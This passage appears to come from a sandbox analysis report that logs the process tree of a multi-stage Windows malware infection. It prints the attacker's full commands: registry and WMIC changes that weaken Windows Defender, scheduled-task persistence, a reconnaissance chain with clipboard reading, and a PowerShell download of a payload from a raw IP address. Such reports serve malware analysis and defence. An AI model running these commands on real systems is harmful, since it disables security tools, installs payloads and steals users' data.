        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2612
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 127.0.0.1
        10⤵
        Runs ping.exe
        
        PID:4612
        
        C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe
        
        "C:\Users\Admin\Pictures\T3cNLr3g0Ri4J7he61UN0lW3.exe"
        8⤵
        Modifies firewall policy service
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:1600
        
        C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe
        
        "C:\Users\Admin\Pictures\hn3O0pnsWX4honw7kWK1yFIQ.exe"
        8⤵
        Executes dropped EXE
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\7zS6C80.tmp\Install.exe
        
        .\Install.exe
        9⤵
        Executes dropped EXE
        
        PID:1712
        
        C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe
        
        .\Install.exe /yrVdidRYRgn "385118" /S
        10⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:5072
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        11⤵
        
        PID:4928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:1044
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        12⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        13⤵
        
        PID:3180
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        14⤵
        
        PID:3124
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        12⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        13⤵
        
        PID:3076
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        14⤵
        
        PID:4372
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        12⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        13⤵
        
        PID:4720
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        14⤵
        
        PID:2492
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        12⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        13⤵
        
        PID:636
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        14⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        12⤵
        
        PID:1284
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        13⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3912
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        15⤵
        
        PID:4940
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        11⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3912
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        14⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 22:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe\" PP /KQgdidVxOn 385118 /S" /V1 /F
        11⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:1664
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
        11⤵
        
        PID:836
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn btZaCbGShXZoJDfvCg
        12⤵
        
        PID:5152
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn btZaCbGShXZoJDfvCg
        13⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 1000
        11⤵
        Program crash
        
        PID:920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
        7⤵
        
        PID:4812
      - C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"
        6⤵
        Executes dropped EXE
        
        PID:2376
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F
        7⤵
        Creates scheduled task(s)
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:432
      - C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
        6⤵
        Executes dropped EXE
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\onefile_2956_133616681024012118\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000038001\buildjudit.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:1208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:1784
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        8⤵
        
        PID:2988
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        8⤵
        
        PID:1932
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        9⤵
        Views/modifies file attributes
        
        PID:3076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
        8⤵
        
        PID:2920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        8⤵
        
        PID:3040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        9⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:3340
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        8⤵
        
        PID:1284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        8⤵
        
        PID:4544
        
        C:\Windows\system32\chcp.com
        
        chcp
        9⤵
        
        PID:1044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        8⤵
        
        PID:3016
        
        C:\Windows\system32\chcp.com
        
        chcp
        9⤵
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        8⤵
        
        PID:2468
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:2420
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        9⤵
        
        PID:2216
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        9⤵
        Collects information from the system
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
        
        C:\Windows\system32\net.exe
        
        net user
        9⤵
        
        PID:1252
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        10⤵
        
        PID:1620
        
        C:\Windows\system32\query.exe
        
        query user
        9⤵
        
        PID:2176
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        10⤵
        
        PID:1776
        
        C:\Windows\system32\net.exe
        
        net localgroup
        9⤵
        
        PID:3132
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        10⤵
        
        PID:4884
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        9⤵
        
        PID:4252
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        10⤵
        
        PID:4516
        
        C:\Windows\system32\net.exe
        
        net user guest
        9⤵
        
        PID:3524
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        10⤵
        
        PID:5076
        
        C:\Windows\system32\net.exe
        
        net user administrator
        9⤵
        
        PID:1976
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        10⤵
        
        PID:4520
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        9⤵
        
        PID:1620
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        9⤵
        Enumerates processes with tasklist
        
        PID:4000
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        9⤵
        Gathers network information
        
        PID:1936
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        9⤵
        
        PID:3004
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        9⤵
        
        PID:5452
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        9⤵
        Gathers network information
        
        PID:5412
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        9⤵
        Launches sc.exe
        
        PID:5280
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        9⤵
        Modifies Windows Firewall
        
        PID:5728
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        9⤵
        Modifies Windows Firewall
        
        PID:5372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        8⤵
        
        PID:3996
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        9⤵
        
        PID:1576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:6036
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:5680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:1500
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:6008
      - C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3172
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
        7⤵
        
        PID:4500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6
        8⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffaf7bb3cb8,0x7ffaf7bb3cc8,0x7ffaf7bb3cd8
        9⤵
        
        PID:6072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
        9⤵
        
        PID:5940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2400
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
        9⤵
        
        PID:1920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
        9⤵
        
        PID:2420
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        9⤵
        
        PID:5484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1
        9⤵
        
        PID:2884
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
        9⤵
        
        PID:5140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
        9⤵
        
        PID:4612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:1
        9⤵
        
        PID:4916
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
        9⤵
        
        PID:2896
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,11459463951498224528,18423096307082271647,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4580 /prefetch:8
        9⤵
        
        PID:5328
        
        C:\Windows\SysWOW64\tar.exe
        
        tar -xf putty.zip
        8⤵
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
        
        C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
        8⤵
        Executes dropped EXE
        
        PID:5200
      - C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3376
        
        C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000043001\volumeinfo.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3684
  - - C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe
      "C:\Users\Admin\AppData\Local\Temp\1000005001\6b4e5c58ea.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:916
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
  C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
  2⤵
  - Executes dropped EXE
  PID:1728
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
  C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\400508\Cruz.pif
  2⤵
  - Executes dropped EXE
  PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3716 -ip 3716
1⤵
PID:1536

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4084

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3548 -ip 3548
1⤵
PID:4760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3480

C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS70C6.tmp\Install.exe PP /KQgdidVxOn 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5648
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5936
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:2892
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5928
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5708
- - C:\Windows\SysWOW64\forfiles.exe
